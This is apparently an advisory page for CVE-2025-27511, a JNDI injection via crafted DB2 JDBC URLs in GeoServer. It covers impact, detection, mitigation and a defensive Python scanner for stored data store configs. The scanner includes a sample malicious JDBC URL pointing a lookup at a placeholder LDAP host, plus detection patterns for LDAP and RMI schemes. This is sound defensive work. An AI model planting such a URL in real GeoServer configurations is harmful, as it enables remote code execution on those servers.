CVE-2025-27511
Undergoing Analysis - In Progress
JNDI Attack via DB2 JDBC URL in GeoServer DB2 DataStore Extension

Publication date: 2026-06-18

Last updated on: 2026-06-18

Assigner: GitHub, Inc.

Description
GeoServer is an open source server that allows users to share and edit geospatial data. Prior to version 2.27.0 of the GeoServer DB2 DataStore Extension, an administrator can perform a JNDI attack through a specially crafted DB2 JDBC URL, leading to Remote Code Execution (RCE). Version 2.27.0 fixes the issue.
Meta Information
Generated: 2026-06-19
AI Q&A generated: 2026-06-18
EPSS Evaluated: N/A
Affected Vendors & Products
Showing 6 associated CPEs

Vendor     Product                            Version / Range
geoserver  db2_datastore_extension            up to 2.27.0 (excluding 2.27.0)
geoserver  geoserver                          2.27.0
ibm        db2_jdbc_driver                    10.5
ibm        db2_jdbc_driver                    11.1
ibm        db2_jdbc_driver                    11.5
geoserver  geoserver_db2_datastore_extension  up to 2.27.0 (excluding 2.27.0)
CWE

CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component, 'Injection'): The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.

CWE-502 (Deserialization of Untrusted Data): The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
Impact Analysis

This vulnerability can have serious impacts, including remote code execution on the affected GeoServer instance with the privileges of the GeoServer process.

The attack requires high privileges (a GeoServer administrator, or anyone holding stolen administrator credentials or a hijacked admin session) but no user interaction. An attacker in that position can compromise the confidentiality, integrity, and availability of the system.

  • Confidentiality impact: Sensitive geospatial data, data store credentials and other secrets readable by the GeoServer process could be exposed.
  • Integrity impact: Data, system configuration and the server itself could be modified maliciously.
  • Availability impact: The system could be disrupted or taken offline by executing arbitrary code.
Executive Summary

The vulnerability in GeoServer's DB2 DataStore Extension prior to version 2.27.0 allows an administrator to perform a JNDI attack through a specially crafted DB2 JDBC URL. This attack can lead to Remote Code Execution (RCE).

Specifically, authenticated users with access to the Vector Data Sources page can create a new DB2 data store with unrestricted connection parameters. Because the parameters are passed to the driver without restriction, a crafted JDBC URL can cause a JNDI lookup against an attacker-controlled service; the object returned by that lookup is deserialized as untrusted data, resulting in RCE.

The vulnerability is tracked under CWE-502 (Deserialization of Untrusted Data) and has a high severity rating with a CVSS score of 7.2.

Detection Guidance

The vulnerability involves a JNDI attack through a specially crafted DB2 JDBC URL in GeoServer's DB2 DataStore Extension prior to version 2.27.0. Detection therefore focuses on attempts to create or modify DB2 data stores with JDBC URLs or connection parameters that could trigger a JNDI lookup.

Since the attack requires an authenticated, highly privileged user with access to the Vector Data Sources page, monitoring for the creation or modification of DB2 data stores (through the web UI or the REST API) and inspecting the stored JDBC URLs for JNDI references can reveal exploitation attempts. Note that a legitimate administrator performing the action will look identical in the logs; the JDBC URL content is the distinguishing signal.

Specific commands are not provided in the available resources, but general approaches include:

  • Review GeoServer logs for DB2 data store creation or modification events, and correlate them with the administrator account and source IP that performed them.
  • Search the persisted store configuration (in a default GeoServer data directory, each store is written to workspaces/<workspace>/<store>/datastore.xml) for JDBC URLs or connection parameters containing JNDI references or unusual URL schemes such as ldap://, ldaps:// or rmi://.
  • Use network monitoring to detect unexpected outbound LDAP (typically TCP 389/636) or RMI (typically TCP 1099) connections originating from the GeoServer host, especially shortly after a data store change.
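As an added illustration of the second bullet above (searching the persisted configuration for JNDI-style references), here is a small scanner written for this page; it is example code, not GeoServer's or GeoTools' own, and everything it assumes is marked: the workspaces/<workspace>/<store>/datastore.xml layout with <connectionParameters><entry key="..."> elements, the parameter key "jdbcUrl" and property name "someJndiProperty" in the constructed sample, and the indicator patterns, which are a heuristic rather than the exact vector of CVE-2025-27511.

```python
"""Heuristic scanner for GeoServer DB2 data store definitions whose
connection parameters look like they would trigger a JNDI lookup.

Added example for this page, not GeoServer or GeoTools code. It assumes
GeoServer persists each store as
<data_dir>/workspaces/<workspace>/<store>/datastore.xml containing
<connectionParameters><entry key="...">value</entry></connectionParameters>.
The key "jdbcUrl" and the property "someJndiProperty" in the constructed
sample are illustrative, and the indicator list is a heuristic.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Heuristic indicators: JNDI provider URL schemes, and the string "jndi"
# itself. Assumption: a lookup target smuggled into a JDBC URL or driver
# property will carry one of these.
JNDI_INDICATORS = [
    re.compile(r"\b(?:ldaps?|rmi|iiop|dns|corba(?:name)?)://", re.IGNORECASE),
    re.compile(r"jndi", re.IGNORECASE),
]

# Constructed sample: a normal DB2 store definition.
BENIGN_XML = """<dataStore>
  <name>parcels_db2</name>
  <type>DB2NG</type>
  <enabled>true</enabled>
  <connectionParameters>
    <entry key="dbtype">db2</entry>
    <entry key="host">db2.internal.example</entry>
    <entry key="port">50000</entry>
    <entry key="database">GIS</entry>
    <entry key="user">geoserver</entry>
  </connectionParameters>
</dataStore>"""

# Constructed sample: the same store with a JDBC URL that carries an LDAP
# lookup target (hypothetical property name, documentation address).
SUSPICIOUS_XML = """<dataStore>
  <name>parcels_db2</name>
  <type>DB2NG</type>
  <enabled>true</enabled>
  <connectionParameters>
    <entry key="dbtype">db2</entry>
    <entry key="jdbcUrl">jdbc:db2://db2.internal.example:50000/GIS:someJndiProperty=ldap://203.0.113.10:1389/a;</entry>
    <entry key="user">geoserver</entry>
  </connectionParameters>
</dataStore>"""


def _entries(root):
    """Yield (key, value) pairs from the store's <connectionParameters>."""
    params = root.find("connectionParameters")
    if params is None:
        return
    for entry in params.findall("entry"):
        yield entry.get("key", ""), (entry.text or "").strip()


def is_db2_store(root):
    """True if the <type> element or the dbtype parameter identifies IBM DB2."""
    if (root.findtext("type") or "").upper().startswith("DB2"):
        return True
    return any(k == "dbtype" and v.lower() == "db2" for k, v in _entries(root))


def scan_datastore_xml(xml_text, source="<string>", db2_only=True):
    """Return one finding dict per connection parameter matching an indicator.

    Every parameter value is checked, not just a known URL key, so a lookup
    target hidden in any property is still reported.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "dataStore" or (db2_only and not is_db2_store(root)):
        return []
    store = root.findtext("name") or "?"
    findings = []
    for key, value in _entries(root):
        for pattern in JNDI_INDICATORS:
            match = pattern.search(value)
            if match:
                findings.append({"source": source, "store": store, "key": key,
                                 "value": value, "indicator": match.group(0)})
                break  # one finding per parameter is enough
    return findings


def scan_data_dir(data_dir, db2_only=True):
    """Walk a GeoServer data directory and scan every datastore.xml found."""
    findings = []
    for path in sorted(Path(data_dir).glob("workspaces/*/*/datastore.xml")):
        try:
            findings.extend(scan_datastore_xml(path.read_text(encoding="utf-8"),
                                               str(path), db2_only))
        except ET.ParseError as exc:  # a store file that is not well-formed XML
            findings.append({"source": str(path), "store": "?", "key": "?",
                             "value": "", "indicator": f"unparseable XML: {exc}"})
    return findings


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_XML), ("suspicious", SUSPICIOUS_XML)):
        for f in scan_datastore_xml(sample, f"constructed-{label}"):
            print(f"{f['source']}: store={f['store']} key={f['key']} "
                  f"indicator={f['indicator']!r}")
```

Run it against a real data directory with `scan_data_dir("/path/to/geoserver_data")`; pass `db2_only=False` to apply the same check to every JDBC-backed store, which is useful when you do not trust the `dbtype` value. Expect false positives from any legitimate parameter that happens to contain "jndi" (for example a store that is deliberately configured to use a JNDI-provided data source), so treat hits as triage input rather than verdicts.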
Mitigation Strategies

The primary mitigation is to upgrade GeoServer's DB2 DataStore Extension to version 2.27.0 or later, which contains the fix. If the DB2 extension is installed but not actually used, removing it eliminates the attack surface entirely.

Additionally, restrict access to the Vector Data Sources page to the smallest set of trusted administrators. Because the vulnerable action is itself an administrative one, protect administrator accounts accordingly: strong, unique credentials, multi-factor authentication where the deployment supports it, and no exposure of the admin interface to untrusted networks.

Implement monitoring and alerting on changes to DB2 data store configurations and on JDBC URLs containing JNDI references or unexpected URL schemes, so that exploitation attempts are detected early.

Apply network-level egress controls so the GeoServer host can reach only the database servers it needs; blocking or alerting on outbound LDAP and RMI connections to unexpected destinations prevents a JNDI lookup from reaching an attacker-controlled server and so breaks the path to remote code execution.

Compliance Impact

The provided information does not specify how the CVE-2025-27511 vulnerability affects compliance with common standards and regulations such as GDPR or HIPAA.
